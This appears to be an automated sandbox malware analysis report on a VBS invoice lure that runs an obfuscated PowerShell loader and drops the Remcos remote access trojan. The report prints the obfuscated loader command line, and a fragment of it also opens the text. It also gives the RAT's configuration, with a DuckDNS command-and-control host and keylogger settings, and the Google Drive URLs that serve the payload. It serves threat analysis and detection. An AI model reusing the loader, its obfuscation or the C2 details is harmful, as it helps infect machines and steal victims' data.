Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-30T09:58:01.808212+020028032702Potentially Bad Traffic192.168.2.549733172.217.16.206443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32}\InprocServer32 source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2767069878.0000000006C33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2777282940.0000000007DC0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49733 -> 172.217.16.206:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2381359043.000001D36D530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2758015392.0000000021600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y3$
              Source: msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Yv
              Source: powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1P
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1XR8l
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhp
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000008.00000003.2698660494.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2662532062.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download
              Source: powershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.5:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49734 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_1812.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Sample has a suspicious name (potential lure to open the executable)
              Source: NTS_eTaxInvoice.html.vbsStatic file information: Suspicious name
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84860B2762_2_00007FF84860B276
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF84860C0222_2_00007FF84860C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8486DA09A2_2_00007FF8486DA09A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FF3204_2_029FF320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FFBF04_2_029FFBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_029FEFD84_2_029FEFD8
              Source: NTS_eTaxInvoice.html.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7485
              Source: unknownProcess created: Commandline size = 7485
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7485Jump to behavior
              Source: amsi32_1812.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Forsvarsundtagelsen.NonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
